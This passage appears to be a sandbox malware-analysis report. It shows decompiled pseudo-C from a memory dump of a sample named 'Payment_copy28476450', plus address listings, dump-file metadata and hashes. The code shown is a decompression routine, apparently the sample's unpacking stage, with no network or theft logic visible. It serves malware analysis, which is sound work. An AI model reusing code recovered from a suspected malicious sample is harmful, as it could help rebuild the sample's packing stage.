												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004065d2
0x004065d2
0x004065d6
0x004065f7
0x004065fe
0x00406604
0x0040660a
0x0040661c
0x00406622
0x00406627
0x00000000
0x004065d8
0x004065de
0x0040699f
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a21
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x004069a2
0x0040699f
0x00000000
0x004065d6

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004066F0() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
